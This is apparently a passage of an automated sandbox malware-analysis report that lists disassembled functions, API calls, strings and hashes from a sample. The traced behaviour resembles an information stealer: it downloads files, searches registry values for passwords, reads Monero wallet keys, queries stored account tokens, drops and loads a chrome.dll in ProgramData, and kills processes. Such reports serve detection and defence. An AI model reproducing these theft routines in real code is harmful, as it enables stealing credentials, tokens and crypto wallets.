                                    • Opcode ID: c701008e2b7ac95a2c46e7f57924c3d5f69872604768b288e12d1d2a70886635
                                    • Instruction ID: aced23c206e97a1bad7226b7e01345d0a9581ac17bb5efcefa86bcc27b0d413d
                                    • Opcode Fuzzy Hash: c701008e2b7ac95a2c46e7f57924c3d5f69872604768b288e12d1d2a70886635
                                    • Instruction Fuzzy Hash: E52124B1A48308ABDB00DFD5DD4AFAEB7BDEB45B14F104519F215AB680C77869018BA8
                                    Function 006860F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 00684800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684889
                                      • Part of subcall function 00684800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684899
                                    • InternetOpenA.WININET(006A0DFB,00000001,00000000,00000000,00000000), ref: 0068615F
                                    • StrCmpCA.SHLWAPI(?,0142E2C0), ref: 00686197
                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 006861DF
                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00686203
                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0068622C
                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0068625A
                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00686299
                                    • InternetCloseHandle.WININET(?), ref: 006862A3
                                    • InternetCloseHandle.WININET(00000000), ref: 006862B0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                    • String ID:
                                    • API String ID: 2507841554-0
                                    • Opcode ID: 84adf0132b900420cc07cde5ea743bb1e6239736925b163c15b1f0b86ac5e2ea
                                    • Instruction ID: f49bea2e18a90f22e31a03fb38177d417233366764a39b64ef1f62853713ead6
                                    • Opcode Fuzzy Hash: 84adf0132b900420cc07cde5ea743bb1e6239736925b163c15b1f0b86ac5e2ea
                                    • Instruction Fuzzy Hash: 6E5172B1A54208ABDF20EFA0DC55BEEB77AAB44301F104198F605A71C1DB74AB89CF95
                                    Function 0070012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • type_info::operator==.LIBVCRUNTIME ref: 0070024D
                                    • ___TypeMatch.LIBVCRUNTIME ref: 0070035B
                                    • CatchIt.LIBVCRUNTIME ref: 007003AC
                                    • CallUnexpected.LIBVCRUNTIME ref: 007004C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                    • String ID: csm$csm$csm
                                    • API String ID: 2356445960-393685449
                                    • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction ID: 9cc8812c1b71d515e08853bfd2a49aee18a924c4fb58d51f37e4796a1468c904
                                    • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                    • Instruction Fuzzy Hash: 21B19B75800209EFCF25DFA4C885AAEBBF5BF05324F10426AF9156B292D338DA51CBD5
                                    Function 00687330 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068739A
                                    • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00687411
                                    • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068746D
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 006874B2
                                    • HeapFree.KERNEL32(00000000), ref: 006874B9
                                    • task.LIBCPMTD ref: 006875B5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$EnumFreeOpenProcessValuetask
                                    • String ID: Password
                                    • API String ID: 775622407-3434357891
                                    • Opcode ID: dd3c141897f5fe4b83021ff6f2983c7c36221cf99c83e531ed7f60a981b8e93f
                                    • Instruction ID: a17dafbc89d3d028dab1d4cb93a5ca5042b44a94bb2c54ea4c3eb63ba0c764f2
                                    • Opcode Fuzzy Hash: dd3c141897f5fe4b83021ff6f2983c7c36221cf99c83e531ed7f60a981b8e93f
                                    • Instruction Fuzzy Hash: 96612DB18141589BDB24EB50CC55BDAB7B9BF44300F1082E9E649A7241DF70AFC9CFA5
                                    Function 0068BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • lstrlen.KERNEL32(00000000), ref: 0068BC6F
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BC9D
                                    • lstrlen.KERNEL32(00000000), ref: 0068BD75
                                    • lstrlen.KERNEL32(00000000), ref: 0068BD89
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                    • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                    • API String ID: 3073930149-1079375795
                                    • Opcode ID: 28542eb845346dee0c583d86a27fb267b0e5cf701593998b712a521ff03f0bc9
                                    • Instruction ID: dcac044bcd0a0ba6017b53582516a5148db6a5c62ea590b74e287ffd27de3ccb
                                    • Opcode Fuzzy Hash: 28542eb845346dee0c583d86a27fb267b0e5cf701593998b712a521ff03f0bc9
                                    • Instruction Fuzzy Hash: C1B13E729141089BCF44FBE0DCA6EEEB3BEAF14301F40455CF50666595EF346A48CBAA
                                    Function 00696A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$DefaultLangUser
                                    • String ID: *
                                    • API String ID: 1494266314-163128923
                                    • Opcode ID: 8db16189341dfec68ff3fa3afa60d1b87a4d288fd88005835c826f87e55e421c
                                    • Instruction ID: bc46b9e4a8f56badebd391a7438040de524b08ddd278e6f89fc5ad28da948fdc
                                    • Opcode Fuzzy Hash: 8db16189341dfec68ff3fa3afa60d1b87a4d288fd88005835c826f87e55e421c
                                    • Instruction Fuzzy Hash: 89F0583092C309EFD744AFE2FC0979CFB34EB04707F114199F61A96290CA706B80AB61
                                    Function 006908A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 00699850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,006908DC,C:\ProgramData\chrome.dll), ref: 00699871
                                      • Part of subcall function 0068A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0068A098
                                    • StrCmpCA.SHLWAPI(00000000,01428F58), ref: 00690922
                                    • StrCmpCA.SHLWAPI(00000000,01428F68), ref: 00690B79
                                    • StrCmpCA.SHLWAPI(00000000,01428DF8), ref: 00690A0C
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00690C35
                                    Strings
                                    • C:\ProgramData\chrome.dll, xrefs: 00690C30
                                    • C:\ProgramData\chrome.dll, xrefs: 006908CD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                    • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                    • API String ID: 585553867-663540502
                                    • Opcode ID: 6eccbd3fa31c263b77895a7683928c131504faa5f2919a9cbd5ea709695b1daf
                                    • Instruction ID: 0e54145eaa2dc4bf99256f7c3cabd1a0ca092ce52d2f5dc139c6041dc0d9b3a1
                                    • Opcode Fuzzy Hash: 6eccbd3fa31c263b77895a7683928c131504faa5f2919a9cbd5ea709695b1daf
                                    • Instruction Fuzzy Hash: 9FA156717002089FCF58FFA4D996AED77BBAF95300F10816DE40A9F651DA309A09CBD6
                                    Function 00689E30 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 163stringsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                    • wsprintfA.USER32 ref: 00689E7F
                                    • lstrcat.KERNEL32(00000000,?), ref: 00689F03
                                    • lstrcat.KERNEL32(00000000,?), ref: 00689F17
                                    • lstrcat.KERNEL32(00000000,006A12D8), ref: 00689F29
                                    • lstrcpy.KERNEL32(?,00000000), ref: 00689F7C
                                    • Sleep.KERNEL32(00001388), ref: 0068A013
                                      • Part of subcall function 006999A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 006999C5
                                      • Part of subcall function 006999A0: Process32First.KERNEL32(0068A056,00000128), ref: 006999D9
                                      • Part of subcall function 006999A0: Process32Next.KERNEL32(0068A056,00000128), ref: 006999F2
                                      • Part of subcall function 006999A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00699A4E
                                      • Part of subcall function 006999A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00699A6C
                                      • Part of subcall function 006999A0: CloseHandle.KERNEL32(00000000), ref: 00699A79
                                      • Part of subcall function 006999A0: CloseHandle.KERNEL32(0068A056), ref: 00699A88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseHandleProcessProcess32$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                    • String ID: D
                                    • API String ID: 531068710-2746444292
                                    • Opcode ID: 5bdff0ab52ba78eabf6c5e4834d6229c0174c7b67333bb5ace9ee16c3657ff79
                                    • Instruction ID: 359bcfbc2de35a25dcd52b9d353f71094212a20c0e7d6c2f103d2e89277d861a
                                    • Opcode Fuzzy Hash: 5bdff0ab52ba78eabf6c5e4834d6229c0174c7b67333bb5ace9ee16c3657ff79
                                    • Instruction Fuzzy Hash: 985175B1944308ABDB24EBA0DC4AFDA777DAF44700F00459CB60DAB281DB75AB84CF55
                                    Function 006FF9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                    Download Yara Rule
                                    APIs
                                    • _ValidateLocalCookies.LIBCMT ref: 006FFA1F
                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 006FFA27
                                    • _ValidateLocalCookies.LIBCMT ref: 006FFAB0
                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006FFADB
                                    • _ValidateLocalCookies.LIBCMT ref: 006FFB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 1170836740-1018135373
                                    • Opcode ID: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction ID: 32a2726579734579a4f39a1e535b8bebca75f85b7009193b81bc660cdf00bfec
                                    • Opcode Fuzzy Hash: 73bc2f32c22e0088af07211562fb197d2e7e36a363a5a26788fe809058fe556b
                                    • Instruction Fuzzy Hash: BE41A63590011DDBCF10DF68C884AEE7BF6FF45324F148165EA18AB392D7759905CB91
                                    Function 00685000 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068501A
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00685021
                                    • InternetOpenA.WININET(006A0DE3,00000000,00000000,00000000,00000000), ref: 0068503A
                                    • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00685061
                                    • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00685091
                                    • InternetCloseHandle.WININET(?), ref: 00685109
                                    • InternetCloseHandle.WININET(?), ref: 00685116
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
